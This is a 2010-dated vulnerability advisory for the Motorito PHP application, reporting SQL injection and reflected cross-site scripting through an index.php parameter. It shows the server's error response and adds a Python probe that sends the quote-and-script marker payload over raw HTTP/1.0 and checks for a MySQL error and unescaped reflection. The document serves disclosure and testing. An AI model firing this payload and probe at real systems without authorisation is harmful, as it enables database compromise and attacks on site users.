This bug was found on CentOS against the latest release of Motorito, running on Apache 2.2.3 with PHP 5.1.6. To exploit the vulnerability it is only necessary to talk to the application using version 1.0 of the HTTP protocol; the response below shows that the parameters of index.php are not properly filtered. The user-supplied value is placed unescaped into the module='...' clause of a SQL query, where the single quote terminates the string literal (SQL injection), and the same value is then echoed back unescaped in the resulting error page (reflected cross-site scripting). Response received from the server:
HTTP/1.1 200 OK
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
</td></tr></table><b>Database error:</b> Invalid SQL: SELECT parentID FROM sis_menus WHERE module='>"'><script>alert(4135)</script>' <br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(4135)</script>'' at line 1)<br>
Session halted.
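The following probe is an added example and is not part of the original advisory or of Motorito. It builds the HTTP/1.0 request the advisory says is required, sends it with a raw socket, and classifies the answer by the two indicators visible in the response above: a MySQL 1064 syntax error (the quote reached the query unescaped) and the marker payload reflected verbatim in the HTML (no output encoding). The host name, port and the parameter name "module" are assumptions; the parameter name is taken from the column in the error message, the advisory does not state it. The embedded sample response is constructed from the advisory's own output so the script runs offline.

```python
import html
import re
import socket
from urllib.parse import quote

# Marker payload from the advisory: the single quote breaks out of the SQL
# string literal, the rest is echoed back into the HTML error page.
PAYLOAD = '>"\'><script>alert(4135)</script>'


def build_request(host, path="/index.php", param="module", payload=PAYLOAD):
    """Raw HTTP/1.0 GET carrying the payload in a query parameter.
    'module' as the parameter name is an assumption (hypothetical)."""
    query = f"{param}={quote(payload, safe='')}"
    return (
        f"GET {path}?{query} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: probe/0.1\r\n"
        f"\r\n"
    ).encode("ascii")


def send_raw(host, port, request, timeout=10):
    """Send the raw request and read until the server closes (HTTP/1.0)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def split_response(raw):
    """Split a raw HTTP response into (status line, header dict, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.decode("iso-8859-1", "replace")


def classify(raw, payload=PAYLOAD):
    """Report the SQL-error and reflection indicators found in a response."""
    status, headers, body = split_response(raw)
    reflected = payload in body                  # echoed as-is: no HTML encoding
    escaped = html.escape(payload) in body       # echoed encoded: output is safe
    mysql_error = re.search(r"MySQL Error</b>:\s*1064", body) is not None
    return {
        "status": status,
        "server": headers.get("server", ""),
        "mysql_error": mysql_error,
        "payload_reflected": reflected,
        "payload_escaped": escaped,
        "sql_injection": mysql_error,
        "reflected_xss": reflected and not escaped,
    }


# Constructed sample: the advisory's response with the folded header line
# rejoined and the body limited to the lines the advisory shows.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Length: 361\r\n"
    b"Date: Fri, 05 Feb 2010 08:53:16 GMT\r\n"
    b"Server: Apache/2.2.3 (CentOS)\r\n"
    b"X-Powered-By: PHP/5.1.6\r\n"
    b"Expires: Thu, 19 Nov 1981 08:52:00 GMT\r\n"
    b"Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\n"
    b"Pragma: no-cache\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"</td></tr></table><b>Database error:</b> Invalid SQL: SELECT parentID FROM "
    b"sis_menus WHERE module='>\"'><script>alert(4135)</script>' <br>\n"
    b"<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the "
    b"manual that corresponds to your MySQL server version for the right syntax "
    b"to use near '><script>alert(4135)</script>'' at line 1)<br>\n"
    b"Session halted.\n"
)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:          # probe a host you are authorised to test
        target = sys.argv[1]
        raw = send_raw(target, 80, build_request(target))
    else:                          # offline: classify the advisory's response
        raw = SAMPLE_RESPONSE
    for key, value in classify(raw).items():
        print(f"{key}: {value}")
```

Run without arguments to classify the embedded sample; pass a host name to send the HTTP/1.0 request to port 80 of a system you are authorised to test. A response that carries the marker only in HTML-encoded form and no MySQL error is reported as neither injectable nor reflecting, which is the result a patched installation should give.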
Through the SQL injection, public defacement, confidential data leakage and compromise of the database server can result from these attacks. Through the reflected cross-site scripting, client systems of the application's users can also be targeted, and complete compromise of these client systems is possible.
Disclosure Timeline:
March 30, 2010: Initial release